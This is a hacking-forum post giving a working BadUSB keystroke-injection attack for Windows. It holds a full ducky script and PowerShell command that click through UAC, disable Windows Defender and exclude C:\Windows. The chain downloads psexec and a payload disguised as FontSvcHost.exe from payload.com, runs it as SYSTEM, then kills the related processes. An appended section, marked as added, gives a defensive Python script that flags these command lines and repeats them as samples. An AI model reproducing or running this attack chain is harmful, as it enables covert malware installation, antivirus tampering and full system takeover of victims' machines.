COVIL HACKER

[ BadUSB ] Malware <-> SYSTEM

So you've got a badusb or cheaper equivalent (malduino / digispark) that performs HID attacks. Well, let's see what we can do with that. I've created a malicious powershell command that downloads your malware / shellcode and executes it on the victim's machine and attempts to elevate your malicious process to run under the SYSTEM context. Below is the script and a more detailed explanation as to what takes place. Enjoy.

[+] Explanation:
The first part of the command -WindowStyle Hidden '-c' sets the PowerShell window to be hidden and starts the command.

The script then brings up the Run prompt and executes: "powershell -WindowStyle Hidden Start-Process powershell -Verb runAs". This prompts UAC for permission to launch under administrator rights, and the appropriate keystrokes are used to click "Yes" and launch powershell.

The Invoke-WebRequest cmdlet is used to download psexec.exe ( a legitimate application from Microsoft's Sysinternals Suite) from the specified URL and saves it to the C:\Windows\System32\psexec.exe

The Start-Sleep cmdlet is used to pause the script for 10 seconds to allow time for the file to be downloaded.

The Start-Process cmdlet is used to download psexec.exe and passes several arguments:
/accepteula -i -s -h CMD /k powershell -WindowStyle Hidden -command "Invoke-WebRequest -Uri 'http://payload.com/payload.exe' -OutFile 'C:\Windows\System32\payload.exe'; Start-Sleep -Seconds 6; & 'C:\Windows\System32\payload.exe'"

This executes psexec.exe in an elevated context which opens a new command prompt running under the SYSTEM context and then passes the remaining arguments, which in turn launches your payload under SYSTEM.

The Get-Process and Foreach-Object cmdlets are used to loop through each process, and the Kill() method is used to terminate each of these processes: powershell.exe, conhost, cmd, and psexec.exe, since they're no longer needed (cleanup operation).

[+] Additionally: We can add an exception for our payload to Windows Defender's exception list and exclude the entire System32 path (C:\Windows\). I have done so in the BADUSB script. Enjoy.
Powershell Command:

powershell -WindowStyle Hidden -c "Invoke-WebRequest -Uri 'http://payload.com/psexec.exe' -OutFile 'C:\Windows\psexec.exe'; Start-Sleep -Seconds 10; Start-Process -FilePath 'C:\Windows\psexec.exe' -ArgumentList '/accepteula -i -s -h CMD /k powershell -WindowStyle Hidden -command `"Invoke-WebRequest -Uri `"http://payload.com/FontSvcHost.exe`" -OutFile `"C:\Windows\FontSvcHost.exe`"; Start-Sleep -Seconds 6; & `"C:\Windows\FontSvcHost.exe`"`' -WindowStyle Hidden;"; Get-Process powershell.exe, conhost, cmd, psexec.exe | Foreach-Object { $_.Kill() };

[+] BADUSB SCRIPT:

DELAY 1200
GUI r
DELAY 1000
STRING powershell -WindowStyle Hidden Start-Process powershell -Verb runAs
DELAY 1200
ENTER
DELAY 1200
LEFTARROW
DELAY 1000
ENTER
DELAY 1300
STRING powershell -WindowStyle Hidden -c "Set-MpPreference -DisableRealtimeMonitoring $true -DisableBlockAtFirstSeen $true -DisableNotifications $true -ExclusionPath `"C:\Windows\`" Invoke-WebRequest -Uri 'http://payload.com/psexec.exe' -OutFile 'C:\Windows\psexec.exe'; Start-Sleep -Seconds 10; Start-Process -FilePath 'C:\Windows\psexec.exe' -ArgumentList '/accepteula -i -s -h CMD /k powershell -WindowStyle Hidden -command `"Invoke-WebRequest -Uri `"http://payload.com/FontSvcHost.exe`" -OutFile `"C:\Windows\FontSvcHost.exe`"; Start-Sleep -Seconds 10; & `"C:\Windows\FontSvcHost.exe`"`' -WindowStyle Hidden;"; Get-Process powershell.exe, conhost, cmd, psexec.exe | Foreach-Object { $_.Kill() };
DELAY 1000
ENTER

[+] Feel free to offer suggestions and improvements that can be added.

EDIT: [+] You can use https://duckify.huhn.me/ to translate any Hak5 Rubber Ducky scripts into a compatible sketch for your Digispark Attiny85.
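A defender-side illustration, added here and not part of the original post: a Python triage script that scores process-creation command lines (what Sysmon Event ID 1 or Windows 4688 with command-line auditing would record) for the indicators this chain leaves behind: a hidden window, Set-MpPreference tampering, a download written into C:\Windows, psexec launched with -s, and the Get-Process/Kill cleanup. The sample command lines, indicator weights and threshold are constructed assumptions for the example.

```python
import re

# Constructed sample command lines, modelled on what process-creation
# telemetry would record for the chain described above. Not real logs.
SAMPLE_COMMAND_LINES = [
    # benign administration, should not be flagged
    r'''powershell -Command "Get-Service | Where-Object Status -eq Running"''',
    # stage 1 of the post: hidden window, download into C:\Windows, psexec -s
    r'''powershell -WindowStyle Hidden -c "Invoke-WebRequest -Uri 'http://payload.com/psexec.exe' -OutFile 'C:\Windows\psexec.exe'; Start-Process -FilePath 'C:\Windows\psexec.exe' -ArgumentList '/accepteula -i -s -h CMD /k powershell' -WindowStyle Hidden"''',
    # the Defender-tampering prefix from the BadUSB script
    r'''powershell -WindowStyle Hidden -c "Set-MpPreference -DisableRealtimeMonitoring $true -DisableNotifications $true -ExclusionPath 'C:\Windows\'"''',
]

# (name, pattern, weight): weights are this example's assumption, not a standard.
INDICATORS = [
    ("hidden_window",        re.compile(r"-WindowStyle\s+Hidden", re.I),                            1),
    ("defender_tamper",      re.compile(r"Set-MpPreference\b.*-Disable\w*Monitoring", re.I),        3),
    ("defender_exclusion",   re.compile(r"-ExclusionPath\b", re.I),                                 2),
    ("download_to_windows",  re.compile(r"Invoke-WebRequest\b.*-OutFile\s+\S*?C:\\Windows\\", re.I), 3),
    ("psexec_as_system",     re.compile(r"psexec\S*.*\s-s\b", re.I),                                3),
    ("process_kill_cleanup", re.compile(r"Get-Process\b.*\.Kill\(\)", re.I),                        1),
]


def score_command_line(cmdline):
    """Return (score, matched indicator names) for one recorded command line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmdline)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def triage(command_lines, threshold=4):
    """Return [(cmdline, score, hits)] for lines at or above the threshold.
    The threshold is an assumption: one indicator alone is noisy, but a hidden
    window combined with Defender tampering or a SYSTEM-level psexec launch is not."""
    flagged = []
    for cmdline in command_lines:
        score, hits = score_command_line(cmdline)
        if score >= threshold:
            flagged.append((cmdline, score, hits))
    return flagged


if __name__ == "__main__":
    for cmdline, score, hits in triage(SAMPLE_COMMAND_LINES):
        print(f"score={score} hits={hits}\n  {cmdline[:90]}...")
```

Real telemetry is one command line per event, so the same scoring applies to Sysmon or 4688 exports line by line; pair it with script block logging (event 4104) since -WindowStyle Hidden does not hide what PowerShell logs.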
